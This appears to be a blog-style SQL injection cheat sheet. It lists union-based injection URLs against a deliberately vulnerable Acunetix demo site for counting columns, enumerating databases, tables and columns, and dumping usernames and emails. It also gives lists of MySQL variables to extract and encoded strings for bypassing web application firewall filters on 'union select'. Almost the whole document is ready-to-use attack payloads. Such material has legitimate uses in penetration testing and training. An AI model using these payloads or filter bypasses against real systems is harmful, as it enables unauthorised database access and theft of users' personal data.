SQLi Cheat Sheet
SQL Cheat Sheet
Below is a working list of useful SQL injection variables used to extract data from databases and systems from the URL.
If you have anything you feel could be added to any of the lists please feel free to write them in the comments and I'll update them accordingly.
Test number of Columns - Watch for Error
http://testphp.acunetix.com/artists.php?artist=1 order by 1,2,3,4
http://testphp.acunetix.com/artists.php?artist=1 order by 1,2,3,4 -- LIMIT 1
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 1/*
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 2/*
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 3/*
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 4/*
Test Injectable Columns - Watch for visual indicators (WAF Filters)
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 1,2,3,4
http://testphp.acunetix.com/listproducts.php?cat=1 -1 /*!UNiOn*/ /*!SeLEct*/ 1,database(),3,4,5,6,7,8,9,10,11
http://testphp.acunetix.com/listproducts.php?cat=1%20%20-1%20%20%20/**//*!12345UNION%20SELECT*//**/%201,database%28%29,3,4,5,6,7,8,9,10,11
http://testphp.acunetix.com/listproducts.php?cat=1%20%20-1%20%20%20%20/**//*!50000UNION%20SELECT*//**/%201,database%28%29,3,4,5,6,7,8,9,10,11
http://testphp.acunetix.com/listproducts.php?cat=1%20%20-1%20%20/**/UNION/**//*!50000SELECT*//**/%201,database%28%29,3,4,5,6,7,8,9,10,11
http://testphp.acunetix.com/listproducts.php?cat=1%20%20-1%20%20%20/*!50000UniON%20SeLeCt*/%201,database%28%29,3,4,5,6,7,8,9,10,11
--*See the 'Web filter Bypass Keywords' below for more*--
Enumerate Information
http://testphp.acunetix.com/artists.php?artist=1 union all select 1,@@version,3,4
http://testphp.acunetix.com/artists.php?artist=1 union all select 1,hex(unhex(@@version)),3,4
http://testphp.acunetix.com/artists.php?artist=1 union all select 1,convert(@@version using latin1),3,4
Enumerate Database
http://testphp.acunetix.com/artists.php?artist=1 union all select 1,database(),3,4
Enumerate Tables
http://testphp.acunetix.com/listproducts.php?cat=1 -1 union all select 1,2,3,4,5,6,7,8,table_name,10,11 from information_schema.tables
Enumerate Columns
http://testphp.acunetix.com/artists.php?artist=1 -1 union select
all 1,2,column_name,4 from information_schema.columns where table_schema='
database' and table_name='
table_name' LIMIT 1,1 -- - LIMIT 1
Enumerate Raw Data
http://testphp.acunetix.com/listproducts.php?cat=1 union select all 1,2,3,4,5,6,group_concat(uname,0x10a,email),8,9,10,11 FROM users
Confirm MYSQL version - If Returns true then end value is true
http://testphp.acunetix.com/listproducts.php?cat=1 and substring(@@version,1,1)=4
http://testphp.acunetix.com/listproducts.php?cat=1 and substring(@@version,1,1)=5
Test if subselect works - If returns Tue then subselect works
testphp.acunetix.com/listproducts.php?cat=1 and (select 1)=1
If subselect works, test for mysql.user - if returns true then it works
testphp.acunetix.com/listproducts.php?cat=1 and (select 1 from mysql.user limit 0,1)=1
Injection
@@hostname
@@tmpdir
@@datadir
@@basedir
@@log
@@log_bin
@@log_error
@@binlog_format
@@time_format
@@date_format
@@ft_boolean_syntax
@@innodb_log_group_home_dir
@@new
@@version
@@version_comment
@@version_compile_os
@@version_compile_machine
@@GLOBAL.have_symlink
@@GLOBAL.have_ssl
@@GLOBAL.VERSION
version()
table_name()
user()
system_user()
session_user()
database()
column_name()
collation(user())
collation(\N)
schema()
UUID()
current_user()
current_user
dayname(from_days(401))
dayname(from_days(402))
dayname(from_days(403))
dayname(from_days(404))
dayname(from_days(405))
dayname(from_days(406))
dayname(from_days(407))
monthname(from_days(690))
monthname(from_unixtime(1))
collation(convert((1)using/**/koi8r))
(select(collation_name)from(information_schema.collations)where(id)=1
(select(collation_name)from(information_schema.collations)where(id)=23
(select(collation_name)from(information_schema.collations)where(id)=36
(select(collation_name)from(information_schema.collations)where(id)=48
(select(collation_name)from(information_schema.collations)where(id)=50
------forever----
Adding Gaps Between requests
testtest nospace 0x1a
test*test * 0x2a
test:test : 0x3a
test::test :: 0x3a3a
testJtest J 0x4a
testZtest Z 0x5a
testjtest j 0x6a
testztest z 0x7a
testtest nospace 0x8a
testtest nospace 0x9a
test test SPACE 0x10a
Web Filter Bypass 'union select' keyword strings
union select
!UNiOn*/ /*!SeLEct*/
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*--*/union/*--*/select/*--*/
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
+UnIOn%0D%0ASeleCt%0D%0A
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A